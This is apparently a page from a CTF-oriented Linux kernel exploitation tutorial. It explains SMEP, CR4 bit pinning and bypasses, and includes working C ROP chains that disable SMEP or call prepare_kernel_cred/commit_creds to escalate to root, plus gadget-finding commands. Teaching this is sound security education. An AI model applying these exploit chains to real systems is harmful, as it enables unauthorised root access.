Supervisor mode execution protection (SMEP)

Supervisor mode execution protection (SMEP) is a mitigation introduced by google engineers in the Linux kernel that prevents ret2usr exploits from working. While in kernel mode (ring0) the process can not execute from pages in userspace. This is a hardware feature offered by intel chips and is controlled by the 20th bit in the CR4 register. The is the same mitigation on ARM devices, but it's called PXN. (Also see this article for Android)

We can check for SMEP through /proc/cpuinfo:

# cat /proc/cpuinfo | grep smep
flags		: fpu de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx lm constant_tsc nopl xtopology cpuid pni cx16 hypervisor smep smap

Before Linux Kernel 5.1

One technique proposed through a google project zero post is to zero out the 20th bit of the CR4 register. To do this Andrey Konovalov used a func(data) primitive to call native_write_cr4(val) with val having the 20th (and 21st) bit set to 0.

This link to kernel source shows the function accept an arbitrary value and attempts to set the CR4 register to the value provided. However we can see that the function mentions some bit pinning!

void native_write_cr4(unsigned long val)
{
	unsigned long bits_changed = 0;

set_register:
	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		}
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
			  bits_changed);
	}
}

It turns out that the kernel ensures that those values are not changed after the CPU is finished initializing and specifies just a couple lines above this function, which bits those are:

/* These bits should not change their value after CPU init is finished. */
static const unsigned long cr4_pinned_mask =
	X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;

These changes were introduced in Linux Kernel 5.1 here and prevent us from over writing those bits using this function. For exploits before 5.1 (for CTFs) we can still use this technique and we need to execute a two gadget rop chain to call this function.

We need the address to native_write_cr4 and a gadget to fill our RDI register as it will contain the argument the function expects. Using ROPgadget we can find a gadget and using either our leak from before or a read off of /proc/kallsyms, we can get the address of native_write_cr4

A quick note here on rop gadget finding for kernels. Make sure you're not running ROPGadget on the bzimage since that's the entire boot image containing the vmlinux kernel image. There is an extract-vmlinux script located inside of the kernel tree that extracts out the vmlinux kernel that we want to use to find our gadgets.

$ ./linux-5.4/scripts/extract-vmlinux linux-5.4/arch/x86/boot/bzImage > vmlinux
$ ROPgadget --binary vmlinux > kernel_gadgets
$ cat kernel_gadgets| grep ': pop rdi ; ret'
0x000000000003be1d : pop rdi ; ret

Using these pieces we can construct a small ROP chain then ends with a jump into our give_me_root function:

unsigned long pop_rdi_ret = 0x3be1d;
unsigned long native_write_cr4_offset = 0x2ddf0;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
  unsigned long *buf = NULL; //[BUF_SIZE];
  unsigned int cookie_offset = 16;
  int bytes_written;

  buf = malloc(BUF_SIZE);
  if (buf == NULL)
    exit_and_log("Failed to malloc\n");

  memset(buf, '\x00', BUF_SIZE);

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = kernel_base + pop_rdi_ret;
  buf[cookie_offset + 3] = 0x6f0; // or 0x407f0
  /*
   * 0x407f0 -> 0b1000000011111110000
   * 0x6f0 -> 0b11011110000
   */
  buf[cookie_offset + 4] = kernel_base + native_write_cr4;
  // Once SMEP is off, we can return to userspace pages again!
  buf[cookie_offset + 5] = (unsigned long)give_me_root;

  // After this write we won't return to the
  // rest of this function
  bytes_written = write(fd, buf, BUF_SIZE);

  printf("Write returned %d\n", bytes_written);

  free(buf);
}

If SMEP bit is pinned

If the SMEP bit is pinned, then we can't overwrite that part of the CR4 register with our own payload and we need to ROP for our prepare_kernel_cred and commit_creds calls. The steps we need to take are straight forward. We need to implement the pseudo assembly as ROP calls:

mov rdi, 0
call prepare_kernel_cred
mod rax, rdi
call commit_creds
swapgs
iretq

Running the previous ret2user payload will result in the following panic:

The process of generating the rop chain given the kernel is pretty straight forward and you won't run into any road bumps. My code for the overflow is shown here and below:

// 0xffffffff8103be1d : pop rdi ; ret
unsigned long pop_rdi_ret = 0xffffffff8103be1d;
// 0xffffffff81033b50 : mov rax, rdi ; ret
unsigned long mov_rax_rdi = 0xffffffff81033b50;
//0xffffffff81c00eaa : swapgs ; popfq ; ret
unsigned long swapgs_popfq_ret = 0xffffffff81c00eaa;
//ffffffff810240c2: 48 cf                 iretq  
unsigned long iretq = 0xffffffff810240c2;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
  unsigned long *buf = NULL; //[BUF_SIZE];
  unsigned int cookie_offset = 16;
  int bytes_written;

  buf = malloc(BUF_SIZE);
  if (buf == NULL)
    exit_and_log("Failed to malloc\n");

  memset(buf, '\x00', BUF_SIZE);

  user_rip = (unsigned long)drop_shell;

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = pop_rdi_ret;
  buf[cookie_offset + 3] = 0 ; // Argument for prepare_kernel_cred
  buf[cookie_offset + 4] = prepare_kernel_cred;
  buf[cookie_offset + 5] = mov_rax_rdi; // move cred struct to argument
  buf[cookie_offset + 6] = commit_creds;
  buf[cookie_offset + 7] = swapgs_popfq_ret;
  buf[cookie_offset + 8] = 0xDEADBEEF; // value for popfq
  buf[cookie_offset + 9] = iretq; // swap from kernel to userspace
  buf[cookie_offset + 10] = user_rip; // <-- here is drop shell function
  buf[cookie_offset + 11] = user_cs;
  buf[cookie_offset + 12] = user_rflags;
  buf[cookie_offset + 13] = user_sp;
  buf[cookie_offset + 14] = user_ss;

  // After this write we won't return to the
  // rest of this function
  bytes_written = write(fd, buf, BUF_SIZE);

  printf("Write returned %d\n", bytes_written);

  free(buf);
}

Success!

PreviousKernel Address Space Layout Randomization (KALSR)NextKernel page table isolation (KPTI)

Last updated 3 years ago